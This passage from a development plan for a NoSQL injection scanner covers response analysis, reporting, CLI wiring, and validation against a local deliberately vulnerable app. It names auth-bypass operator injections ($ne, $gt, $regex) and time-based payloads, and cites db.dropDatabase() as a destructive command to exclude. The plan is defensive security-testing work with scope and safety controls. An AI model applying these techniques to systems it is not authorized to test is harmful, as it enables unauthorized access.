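        elif _rank(finding.severity, finding.confidence) > _rank(current.severity, current.confidence):
            finding.corroborating = [*current.corroborating, current.payload, *finding.corroborating]
            best[key] = finding
        else:
            current.corroborating.append(finding.payload)
    return list(best.values())
```

Keeping the rules as a list makes the table easy to adjust without touching the comparison logic.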

Deliverables:

  • core/analyzer.py — multi-heuristic response analyzer with severity scoring
  • Finding deduplication logic

Exit Criteria:

  • Analyzer correctly flags the $ne/$gt auth bypass on /api/vuln/login as critical / confirmed
  • Analyzer correctly produces no findings for the same payloads against /api/secure/login
  • Time-based analysis correctly flags delayed responses (tested with time_based payloads)
  • MongoDB error exposure correctly detected when errors leak in response body
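The timing criterion can be checked with a few lines of arithmetic, following the rule stated for `_check_timing_anomaly` (response time greater than baseline plus 80% of the expected delay). The sketch below is illustrative only. `check_timing_anomaly` is a free-function stand-in, and falling back to a fixed 2500 ms margin when a payload carries no `expected_delay_ms` is an assumption loosely based on the analyzer's `time_threshold_ms` default.

```python
from typing import Optional


def check_timing_anomaly(
    response_time_ms: float,
    baseline_time_ms: float,
    expected_delay_ms: Optional[float] = None,
    fallback_threshold_ms: float = 2500.0,  # assumed fallback margin
    tolerance: float = 0.8,
) -> tuple[bool, str]:
    """Flag responses that are slower than baseline by most of the expected delay."""
    if expected_delay_ms is not None:
        margin = expected_delay_ms * tolerance
    else:
        margin = fallback_threshold_ms
    triggered = response_time_ms > baseline_time_ms + margin
    evidence = ""
    if triggered:
        evidence = (
            f"Time-based blind: response took {response_time_ms:.0f}ms "
            f"(baseline: {baseline_time_ms:.0f}ms)"
        )
    return triggered, evidence
```

With a 40 ms baseline and a 3000 ms sleep payload, the cutoff is 40 + 3000 × 0.8 = 2440 ms, so a 3100 ms response is flagged and a 900 ms response is not. The 0.8 factor leaves headroom for servers that return slightly before the full delay elapses.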

References: R1, R2, R5


Phase 6 — Report Generation and Console Output

Goals: Produce the final JSON report and a professional console summary.

Work Packages:

  1. Create core/reporter.py — Implement:

    • generate_json_report(scan_result: ScanResult, output_path: str) — writes JSON matching the contract:
      {
        "target": "http://localhost:3000",
        "scan_time": "2026-04-22T10:15:00Z",
        "scan_duration_seconds": 42,
        "summary": {
          "pages_crawled": 3,
          "forms_tested": 2,
          "payloads_tested": 48,
          "potential_findings": 4,
          "by_severity": {
            "critical": 1,
            "high": 2,
            "medium": 1,
            "low": 0,
            "info": 0
          }
        },
        "findings": [ ... ]
      }
    • print_console_summary(scan_result: ScanResult) — uses rich to display:
      • Header banner with scan metadata
      • Summary statistics table
      • Findings table with columns: Severity, Endpoint, Payload Category, Evidence, Confidence
      • Color-coded severity (Critical=red bold, High=red, Medium=yellow, Low=cyan, Info=dim)
      • Footer with report file path
  2. Verbose output mode: When --verbose is active, print each request/response pair as it happens (method, URL, content-type, payload, status code, response time, first 200 chars of body).
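Assembling the report dictionary in the shape of the sample above might look like the following sketch. The field names are taken from that sample only. The full contract lives in README.md, so anything beyond these keys is unknown here. `build_report` is a hypothetical helper, and findings are represented as plain dicts for brevity.

```python
import json
from collections import Counter
from datetime import datetime

SEVERITIES = ("critical", "high", "medium", "low", "info")


def _parse_iso(timestamp: str) -> datetime:
    # Replace a trailing "Z" so fromisoformat also works on Python 3.10.
    return datetime.fromisoformat(timestamp.replace("Z", "+00:00"))


def build_report(target: str, scan_start: str, scan_end: str,
                 pages_crawled: int, forms_tested: int, payloads_tested: int,
                 findings: list[dict]) -> dict:
    """Build a report dict mirroring the sample JSON structure."""
    duration = _parse_iso(scan_end) - _parse_iso(scan_start)
    counts = Counter(f["severity"] for f in findings)
    return {
        "target": target,
        "scan_time": scan_start,
        "scan_duration_seconds": int(duration.total_seconds()),
        "summary": {
            "pages_crawled": pages_crawled,
            "forms_tested": forms_tested,
            "payloads_tested": payloads_tested,
            "potential_findings": len(findings),
            # Every severity appears, even with a zero count.
            "by_severity": {level: counts.get(level, 0) for level in SEVERITIES},
        },
        "findings": findings,
    }


def write_report(report: dict, output_path: str) -> None:
    """Serialize the report as indented UTF-8 JSON."""
    with open(output_path, "w", encoding="utf-8") as handle:
        json.dump(report, handle, indent=2)
```

Emitting all five severity keys keeps the report shape stable for any downstream tooling that reads `by_severity`.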

Deliverables:

  • core/reporter.py — JSON file writer + Rich console table
  • Verbose request/response logging

Exit Criteria:

  • JSON report validates against the contract schema
  • Console output is readable, color-coded, and includes all findings
  • Verbose mode logs every request/response pair with timing

References: R1, R6


Phase 7 — CLI Entry Point and Pipeline Integration

Goals: Wire everything together in scanner.py and implement the full scan pipeline.

Work Packages:

  1. Implement scanner.py — Full argument parser and orchestration:

    usage: scanner.py [-h] --url URL [--max-depth N] [--timeout SECS]
                      [--delay SECS] [--output FILE] [--verbose]
                      [--content-type {both,urlencoded,json}]
                      [--endpoints ENDPOINT [ENDPOINT ...]]
                      [--categories CATEGORY [CATEGORY ...]]
    

    Arguments:

    • --url (required): Target base URL
    • --max-depth (default: 2): Crawl depth limit
    • --timeout (default: 5): Per-request timeout in seconds
    • --delay (default: 0.1): Delay between injection requests in seconds
    • --output (default: report.json): Output report file path
    • --verbose / -v: Enable verbose request/response logging
    • --content-type (default: both): Which content types to test (both, urlencoded, json)
    • --endpoints: Manual endpoint override — skip crawling and inject directly into these endpoints (e.g., POST:/api/vuln/login:username,password)
    • --categories: Filter payload categories (e.g., operator_injection time_based)
  2. Scan pipeline in main():

    import sys
    from datetime import datetime, timezone

    import requests

    # Project-local imports (Crawler, Injector, ResponseAnalyzer, etc.) are omitted here.

    def main():
        args = parse_args()
        logger = setup_logging(args.verbose)
        print_banner()
        # Record the scan start as a timezone-aware UTC timestamp
        start_time = datetime.now(timezone.utc).isoformat()

        # Phase 1: Validate
        base_url = validate_url(args.url)
        reachable, status, rtt = check_reachability(base_url, args.timeout)
        if not reachable:
            logger.error(f"Target unreachable: {base_url}")
            sys.exit(1)

        # Phase 2: Load payloads
        payloads = load_payloads("payloads.json")
        if args.categories:
            payloads = {k: v for k, v in payloads.items() if k in args.categories}

        # Phase 3: Discover forms
        session = requests.Session()
        pages = []  # stays empty in --endpoints mode, where crawling is skipped
        if args.endpoints:
            forms = parse_manual_endpoints(args.endpoints)
        else:
            crawler = Crawler(base_url, args.max_depth, args.timeout, session)
            pages = crawler.crawl()
            forms = []
            for page in pages:
                forms.extend(parse_forms(page.html, page.url))

        # Phase 4: Inject and analyze
        injector = Injector(session, args.timeout, args.delay, args.verbose)
        analyzer_findings = []
        all_payloads = get_all_payloads(payloads)
        total_injections = 0  # number of injection results across all forms

        for form in forms:
            baseline = injector.establish_baseline(form)
            results = injector.inject_form(form, all_payloads)
            total_injections += len(results)
            response_analyzer = ResponseAnalyzer(baseline)
            for result in results:
                finding = response_analyzer.analyze(result)
                if finding:
                    analyzer_findings.append(finding)

        # Phase 5: Report
        scan_result = ScanResult(
            target=base_url,
            scan_start=start_time,
            scan_end=datetime.now(timezone.utc).isoformat(),
            pages_crawled=len(pages),
            forms_discovered=len(forms),
            payloads_tested=total_injections,
            findings=deduplicate_findings(analyzer_findings)
        )
        generate_json_report(scan_result, args.output)
        print_console_summary(scan_result)
  3. Error handling wrapper: Wrap the entire pipeline in try/except. Handle KeyboardInterrupt (print partial results), ConnectionError (retry once then fail), and unexpected errors (log traceback, exit 1).

  4. Exit codes: 0 = success (scan completed, findings or not), 1 = scan error (unreachable target, etc.), 2 = argument error.
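
The argument list and exit codes above map fairly directly onto argparse. The following is a sketch under assumptions, not the final scanner.py: the `build_parser` name is hypothetical, and the empty-list default for --endpoints is taken from the configuration table later in this plan. It relies on one documented argparse behavior: a parse error prints usage and exits with status 2, which matches the "argument error" exit code without extra handling.

```python
import argparse


def build_parser() -> argparse.ArgumentParser:
    """Build the CLI parser with the defaults listed in this plan."""
    parser = argparse.ArgumentParser(prog="scanner.py")
    parser.add_argument("--url", required=True, help="Target base URL")
    parser.add_argument("--max-depth", type=int, default=2, metavar="N",
                        help="Crawl depth limit")
    parser.add_argument("--timeout", type=float, default=5.0, metavar="SECS",
                        help="Per-request timeout in seconds")
    parser.add_argument("--delay", type=float, default=0.1, metavar="SECS",
                        help="Delay between injection requests in seconds")
    parser.add_argument("--output", default="report.json", metavar="FILE",
                        help="Output report file path")
    parser.add_argument("--verbose", "-v", action="store_true",
                        help="Enable verbose request/response logging")
    parser.add_argument("--content-type", default="both",
                        choices=["both", "urlencoded", "json"],
                        help="Which content types to test")
    parser.add_argument("--endpoints", nargs="+", default=[], metavar="ENDPOINT",
                        help="Skip crawling and inject into these endpoints")
    # None means "use every category in payloads.json".
    parser.add_argument("--categories", nargs="+", default=None, metavar="CATEGORY",
                        help="Restrict the scan to these payload categories")
    return parser
```

For example, `build_parser().parse_args(["--url", "http://localhost:3000", "-v"])` yields a namespace with `max_depth == 2` and `verbose == True`, while omitting --url terminates the process with exit status 2.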

Deliverables:

  • Complete scanner.py with argument parsing and pipeline orchestration
  • Manual endpoint mode (--endpoints)
  • Error handling and exit codes

Exit Criteria:

  • python scanner.py --help prints full usage
  • python scanner.py --url http://localhost:3000 --output report.json completes a full scan and produces a valid report
  • python scanner.py --url http://localhost:3000 --endpoints "POST:/api/vuln/login:username,password" --verbose scans only the login endpoint
  • Scanner exits with code 2 on bad arguments, code 1 on connection failure
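
The --endpoints value used in the criteria above follows a METHOD:/path:field1,field2 shape. One way to parse it is sketched below. The `ManualEndpoint` container and the `parse_endpoint_spec` name are hypothetical (the project may populate FormTarget directly), and splitting on the first and last colon is an assumption that tolerates colons inside the path.

```python
from dataclasses import dataclass


@dataclass
class ManualEndpoint:
    # Hypothetical container; the project may reuse FormTarget instead.
    method: str
    path: str
    fields: list


def parse_endpoint_spec(spec: str) -> ManualEndpoint:
    """Parse 'METHOD:/path:field1,field2' into its three parts."""
    message = f"Expected METHOD:/path:field1,field2, got {spec!r}"
    try:
        # First colon ends the method; last colon starts the field list.
        method, rest = spec.split(":", 1)
        path, field_csv = rest.rsplit(":", 1)
    except ValueError:
        raise ValueError(message) from None
    fields = [name.strip() for name in field_csv.split(",") if name.strip()]
    if not method or not path.startswith("/") or not fields:
        raise ValueError(message)
    return ManualEndpoint(method.upper(), path, fields)
```

Raising `ValueError` on a malformed spec lets the caller decide whether to treat it as an argument error (exit code 2) or to skip the entry with a warning.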

References: R1, R4


Phase 8 — Testing and Validation

Goals: Validate the scanner produces correct results against both vulnerable and secure flows.

Work Packages:

  1. Validate against vulnerable flow:

    • Run full scan against http://localhost:3000 (vulnerable mode endpoints)
    • Confirm the report contains:
      • At least one critical finding for auth bypass on /api/vuln/login
      • At least one high finding for search injection on /api/vuln/search
    • Verify payloads that triggered include: $ne, $gt, $regex operator injections
    • Verify evidence descriptions are clear and actionable
  2. Validate against secure flow:

    • Run scan with --endpoints "POST:/api/secure/login:username,password" "POST:/api/secure/search:query"
    • Confirm the report contains zero findings (secure endpoints reject all operator payloads with 400)
    • Verify no false positives from timing noise or status code coincidences
  3. Edge case testing:

    • Test against unreachable URL → clean error message, exit code 1
    • Test with --timeout 0.001 → timeout handling works gracefully
    • Test with empty payloads.json → scanner reports no payloads to test
    • Test with --max-depth 0 → scanner tests only the root page
    • Test with malformed HTML target → parser handles gracefully
  4. Performance validation:

    • Full scan completes in under 60 seconds
    • Memory usage stays under 100MB
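
The vulnerable-flow and secure-flow expectations above can be checked mechanically against a loaded report. The sketch below assumes each entry in `findings` carries `endpoint` and `severity` keys; the plan elides the finding schema, so both key names and all three function names are hypothetical.

```python
def has_finding(report: dict, endpoint: str, severity: str) -> bool:
    """True if any finding matches both the endpoint and the severity."""
    return any(
        f.get("endpoint") == endpoint and f.get("severity") == severity
        for f in report.get("findings", [])
    )


def check_vulnerable_flow(report: dict) -> list:
    """Return unmet expectations; an empty list means the check passed."""
    expected = [("/api/vuln/login", "critical"), ("/api/vuln/search", "high")]
    return [
        f"missing {severity} finding for {endpoint}"
        for endpoint, severity in expected
        if not has_finding(report, endpoint, severity)
    ]


def check_secure_flow(report: dict) -> list:
    """The secure endpoints should yield no findings at all."""
    return [
        f"unexpected finding for {f.get('endpoint')}"
        for f in report.get("findings", [])
    ]
```

Returning a list of problems rather than a boolean keeps the failure output readable when several expectations are missed in one run.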

Deliverables:

  • Validated scan reports for both vulnerable and secure flows
  • Edge case test results documented
  • Performance benchmarks recorded

Exit Criteria:

  • Zero false negatives against the vulnerable flow (all known vulnerabilities detected)
  • Zero false positives against the secure flow
  • All edge cases handled gracefully without crashes

References: R1, R2, R5


Phase 9 — Packaging, Documentation, and Release Readiness

Goals: Polish the tool for release, finalize documentation, and ensure reproducible builds.

Work Packages:

  1. Finalize requirements.txt with exact pinned versions from the working venv (pip freeze)
  2. Update README.md with:
    • Installation instructions (venv setup, pip install)
    • Complete usage examples (basic scan, verbose mode, manual endpoints, category filtering)
    • Report output description with annotated example
    • Troubleshooting section (common errors and solutions)
  3. Add inline docstrings to all public functions and classes
  4. Add --version flag to the CLI
  5. Verify clean install: delete venv, recreate, install deps, run scan — everything works from scratch
  6. Create example reports: Include a sample example_report.json in the repo showing expected output

Deliverables:

  • Pinned requirements.txt
  • Updated README.md with full documentation
  • All modules documented with docstrings
  • Example report file
  • Clean install verified

Exit Criteria:

  • pip install -r requirements.txt && python scanner.py --help works from a fresh venv
  • README covers all CLI options and includes worked examples
  • Example report demonstrates the output format

References: R1, R6


6. Security Plan (Cross-Cutting)

6.1 Threat Model Checklist

  • Accidental scanning of production systems — user mistypes URL or forgets scope restrictions; could trigger WAF alerts or legal issues
  • Credential leakage in reports — session cookies or leaked credentials from successful bypasses appear in JSON reports
  • Payload self-injection — if scanner processes its own output or error messages contain payloads, could cause confusion
  • Dependency supply chain — compromised PyPI packages in the dependency chain
  • Excessive resource consumption — unbounded crawling or aggressive request rates could DoS the target

6.2 Mandatory Controls

  1. Legal disclaimer: Scanner prints a warning on startup: "This tool should only be used on systems you own or have explicit authorization to test."
  2. Localhost default scope: When targeting non-localhost origins, require explicit --confirm-external flag
  3. Report sanitization: Truncate response bodies in reports to 500 characters; strip Set-Cookie headers from stored responses
  4. Dependency pinning: All dependencies pinned to specific versions in requirements.txt
  5. Request rate limiting: Default 100ms delay between requests (--delay flag), with minimum floor of 50ms
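
Controls 2, 3, and 5 reduce to small pure functions, sketched below. The function names are hypothetical, and treating "localhost" as the literal hostname plus any loopback IP address is an assumption about what the plan means by local scope.

```python
import ipaddress
from urllib.parse import urlparse

MIN_DELAY_SECONDS = 0.05   # 50ms floor from control 5
MAX_BODY_CHARS = 500       # truncation limit from control 3


def is_local_target(url: str) -> bool:
    """True for 'localhost' or a loopback IP such as 127.0.0.1 or ::1."""
    host = urlparse(url).hostname or ""
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        # Not an IP literal, so it is some other hostname.
        return False


def effective_delay(requested: float) -> float:
    """Clamp the user-supplied delay to the minimum floor."""
    return max(requested, MIN_DELAY_SECONDS)


def sanitize_response(headers: dict, body: str) -> tuple:
    """Drop Set-Cookie (case-insensitively) and truncate the body."""
    clean = {k: v for k, v in headers.items() if k.lower() != "set-cookie"}
    return clean, body[:MAX_BODY_CHARS]
```

A scan against a target where `is_local_target` returns False would then proceed only when --confirm-external was passed.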

6.3 Security Testing Controls

  • Run pip-audit or safety check against installed dependencies before release
  • Manual review of all payloads in payloads.json to ensure they are detection-only (no destructive operations like db.dropDatabase())
  • Verify scanner does not follow redirects to external domains during crawling
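
The redirect check in the last item can be expressed as an origin comparison. This is a sketch with hypothetical helper names; it assumes "external" means a different scheme, host, or port than the base URL.

```python
from urllib.parse import urljoin, urlparse

DEFAULT_PORTS = {"http": 80, "https": 443}


def _origin(url: str) -> tuple:
    """Return (scheme, host, port), filling in the scheme's default port."""
    parts = urlparse(url)
    port = parts.port or DEFAULT_PORTS.get(parts.scheme)
    return parts.scheme, parts.hostname, port


def same_origin(base_url: str, location: str) -> bool:
    """True if a Location header value resolves to the base URL's origin."""
    # urljoin resolves relative and scheme-relative redirect targets.
    return _origin(base_url) == _origin(urljoin(base_url, location))
```

With requests, one option is to pass `allow_redirects=False`, read the `Location` response header, and follow it manually only when `same_origin` returns True.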

7. Performance Plan (Cross-Cutting)

7.1 Key Levers

  • Request timeout — controls how long each injection attempt waits; directly impacts total scan time
  • Inter-request delay — prevents overwhelming the target; trades scan speed for target stability
  • Crawl depth — limits the number of pages discovered; deeper crawls find more forms but take longer
  • Payload count — more payloads = more thorough coverage but longer scans
  • Content-type testing — testing both urlencoded and JSON doubles the request count

7.2 Recommended Defaults

| Setting | Default | Rationale |
| --- | --- | --- |
| --timeout | 5s | Sufficient for localhost; prevents hanging on unresponsive endpoints |
| --delay | 0.1s | 100ms is respectful to target while keeping scan time reasonable |
| --max-depth | 2 | Captures most forms without deep-crawling large sites |
| --content-type | both | Maximizes detection coverage; necessary since Express handles both formats |
| Time-based threshold | 2500ms | Sleep payloads use 3000ms; 2500ms threshold accounts for network jitter |

7.3 Runtime Safeguards

  • Per-request timeout: Hard timeout of --timeout seconds on every HTTP request; requests.Timeout caught and logged
  • Max pages cap: Crawler stops after 50 pages regardless of depth (prevents infinite crawling on large sites)
  • Max payloads per form: Warn if more than 100 payloads are being tested per form (likely misconfiguration)
  • Response body cap: Read at most 1MB of response body per request (prevents memory issues on large responses)
  • Graceful degradation: If a form fails baseline capture (e.g., requires auth), skip it with a warning instead of aborting the entire scan
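
The response body cap can be enforced while streaming, so an oversized response is never fully buffered. The sketch below works on any iterable of byte chunks; the `read_capped` name is hypothetical and the 1,000,000-byte default is one reading of "1MB".

```python
def read_capped(chunks, limit: int = 1_000_000) -> bytes:
    """Concatenate byte chunks, stopping once `limit` bytes are collected."""
    buf = bytearray()
    for chunk in chunks:
        remaining = limit - len(buf)
        if remaining <= 0:
            break
        # Take only as much of this chunk as still fits under the cap.
        buf.extend(chunk[:remaining])
    return bytes(buf)
```

With requests, the chunks could come from a response opened with `stream=True`, for example `read_capped(response.iter_content(chunk_size=8192))`.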

8. Configuration Surface

8.1 Non-Secret Settings

| Key | Type | Default | Description |
| --- | --- | --- | --- |
| --url | string | (required) | Target base URL |
| --max-depth | int | 2 | Maximum crawl depth |
| --timeout | float | 5.0 | Per-request timeout (seconds) |
| --delay | float | 0.1 | Inter-request delay (seconds) |
| --output | string | report.json | Output report file path |
| --verbose | bool | false | Enable detailed request/response logging |
| --content-type | enum | both | Content types to test: both, urlencoded, json |
| --endpoints | list[str] | [] | Manual endpoint specifications (skip crawling) |
| --categories | list[str] | all | Payload categories to use |

8.2 Secret / Credential Storage

No secrets are required by the scanner itself. If the target requires authentication before scanning protected endpoints, the user should:

  1. Use --endpoints mode with manually specified endpoints
  2. Or pre-authenticate via browser and export cookies to a file (future V2 feature)

No credential storage mechanism is needed for V1.


9. CI/CD and Governance Plan

Pull Requests / Merges

  1. All code changes via pull request to main
  2. PR checks:
    • Python syntax validation (python -m py_compile on all .py files)
    • pip install -r requirements.txt succeeds
    • Basic smoke test: python scanner.py --help exits 0
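
The syntax-validation check could also be driven from a small Python script instead of a shell loop. This is a sketch, with `find_syntax_errors` as a hypothetical helper; it uses the standard library's `py_compile.compile` with `doraise=True` so that failures surface as exceptions.

```python
import py_compile
from pathlib import Path


def find_syntax_errors(root: str) -> list:
    """Compile every .py file under root; return (path, message) per failure."""
    failures = []
    for path in sorted(Path(root).rglob("*.py")):
        try:
            py_compile.compile(str(path), doraise=True)
        except py_compile.PyCompileError as exc:
            failures.append((str(path), exc.msg))
    return failures
```

A CI step can exit non-zero when the returned list is not empty. Pointing `root` at the source directory rather than the repository root avoids compiling files inside a local venv.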

Release Candidates

  1. Full integration test against the vulnerable target app
  2. Dependency audit (pip-audit)
  3. Clean install test from fresh venv
  4. Report output validation against schema

Branch and Review Policy

  • main branch is protected
  • Feature branches named feature/<description>
  • At least one reviewer approval required before merge
  • Squash merges preferred for clean history

10. Risks and Mitigations

Risk 1 (Technical) — The target app's forms use JavaScript-based submission (fetch API), so standard HTML form parsing may miss the actual API endpoints. Mitigation — Implement --endpoints manual override mode; additionally, add JS file scanning to extract fetch/XHR URLs as a best-effort enhancement.

Risk 2 (Security) — A user accidentally runs the scanner against a production system they don't own, causing legal liability. Mitigation — Print mandatory legal disclaimer on startup; require --confirm-external flag for non-localhost targets.

Risk 3 (Operational) — The target app's session management (cookie-based) may cause false positives if a bypass payload sets a session that affects subsequent requests. Mitigation — Reset session (clear cookies) between payload groups; establish fresh baseline before each form's injection round.

Risk 4 (UX/Adoption) — False positives erode user trust and make the tool unreliable for real assessments. Mitigation — Multi-factor heuristic scoring (require both status code change AND body content indicator for "confirmed" confidence); clear confidence labels (confirmed/tentative/speculative) in reports.
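
The confidence rule in Risk 4 can be illustrated with a two-signal classifier. Only the "confirmed" condition comes from this plan; mapping a single signal to "tentative" and no signal to "speculative" is an assumption, and the function name is hypothetical.

```python
def classify_confidence(status_changed: bool, body_indicator: bool) -> str:
    """Label a finding by how many independent signals support it."""
    if status_changed and body_indicator:
        # Both signals agree: the only case this plan calls "confirmed".
        return "confirmed"
    if status_changed or body_indicator:
        # Assumed mapping: exactly one signal present.
        return "tentative"
    # Assumed mapping: flagged by some weaker heuristic, such as timing alone.
    return "speculative"
```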

Risk 5 (Technical) — Time-based blind detection is inherently noisy — network latency can cause false positives/negatives. Mitigation — Use conservative threshold (payload delay × 0.8); run time-based payloads last; recommend local-network testing for reliable timing results.
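
The threshold rule in Risk 5 is simple arithmetic, sketched below with hypothetical function names. With the 0.8 factor, a 3000ms sleep payload gives a threshold of about 2400ms, slightly below the 2500ms default listed in Section 7.2, so the factor is left as a parameter rather than fixed.

```python
def timing_threshold_ms(payload_delay_ms: float, factor: float = 0.8) -> float:
    """Threshold above which a response counts as delayed by the payload."""
    return payload_delay_ms * factor


def is_timing_hit(elapsed_ms: float, payload_delay_ms: float,
                  factor: float = 0.8) -> bool:
    """True if the observed response time meets or exceeds the threshold."""
    return elapsed_ms >= timing_threshold_ms(payload_delay_ms, factor)
```

This sketch compares the raw elapsed time only. Whether the baseline response time should be subtracted first is a design choice the plan does not specify.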


11. Milestone Timeline

| Week | Phases | Description |
| --- | --- | --- |
| Week 1 | Phase 0 + Phase 1 | Environment setup, models, payloads, utilities |
| Week 2 | Phase 2 + Phase 3 | URL validation, crawler, form parser |
| Week 3 | Phase 4 | Injection engine with dual content-type support |
| Week 4 | Phase 5 + Phase 6 | Response analyzer, severity scoring, report generation |
| Week 5 | Phase 7 | CLI entry point, pipeline integration |
| Week 6 | Phase 8 + Phase 9 | Testing, validation, documentation, release |

12. Definition of Done (Project)

  • python scanner.py --url http://localhost:3000 --output report.json completes without errors
  • JSON report correctly identifies auth bypass on /api/vuln/login as critical
  • JSON report correctly identifies search injection on /api/vuln/search as high
  • Scanner produces zero false positives against /api/secure/login and /api/secure/search
  • payloads.json contains 20+ categorized payloads derived from wordlist and reference materials
  • Console output is color-coded with rich formatting and includes progress indicators
  • --verbose mode logs every request/response pair
  • --endpoints manual mode works for targeted scanning without crawling
  • All errors (timeout, connection, malformed HTML) are handled gracefully
  • README.md contains complete usage documentation with examples
  • requirements.txt contains pinned dependencies that install cleanly
  • Report output matches the JSON contract defined in the README

13. Reference Index

| ID | Title | Location |
| --- | --- | --- |
| R1 | Project README — CLI Scanner | README.md |
| R2 | NoSQL Injection Reference Guide | NoSQL Injection.md |
| R3 | NoSQL Injection Wordlist | nosqli_worlist.txt |
| R4 | Vulnerable Target — Server Config | server.js |
| R5 | Mode Auth Flow Test Results | MODE_AUTH_FLOW_TEST_RESULTS.md |
| R6 | Project Tasks Checklist | TASKS.md |
| R7 | NoSQL Testing Guide | NOSQLI_TESTING_GUIDE.md |
| R8 | Vulnerable Auth Controller | vulnAuth.js |
| R9 | Vulnerable Search Controller | vulnSearch.js |
| R10 | Vulnerable Routes | vulnRoutes.js |

14. Immediate Next Execution Steps

  1. Create the cli/core/ package: mkdir cli/core && touch cli/core/__init__.py — establish the module structure.
  2. Write core/models.py: Define all dataclasses (FormTarget, Payload, Finding, ScanResult, BaselineResponse, InjectionResult). This is the zero-dependency starting point that all other modules import.
  3. Populate payloads.json: Curate the full payload catalog from the wordlist and reference guide. Validate it loads correctly with json.load().
  4. Write core/utils.py: Implement logging setup, URL helpers, and all constant lists (error signatures, success/failure indicators). Import and test from a REPL.
  5. Write requirements.txt: Add requests>=2.32, beautifulsoup4>=4.12, rich>=13.0, urllib3>=2.0 and run pip install -r requirements.txt to confirm clean installation.
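
For step 3, a loader that validates the catalog shape might look like the sketch below. It assumes payloads.json is a JSON object mapping category names to lists of payload entries, which is what the category filter in the Phase 7 pipeline implies. Returning (category, entry) pairs from `get_all_payloads` is also an assumption about that helper's output.

```python
import json


def load_payloads(path: str) -> dict:
    """Load payloads.json and check it maps category names to lists."""
    with open(path, encoding="utf-8") as fh:
        data = json.load(fh)
    if not isinstance(data, dict):
        raise ValueError("payloads.json must map category names to payload lists")
    for category, entries in data.items():
        if not isinstance(entries, list):
            raise ValueError(f"Category {category!r} must contain a list of payloads")
    return data


def get_all_payloads(payloads: dict) -> list:
    """Flatten the catalog into (category, entry) pairs, keeping file order."""
    return [
        (category, entry)
        for category, entries in payloads.items()
        for entry in entries
    ]
```

An empty catalog loads without error and flattens to an empty list, which lets the caller report "no payloads to test" instead of crashing.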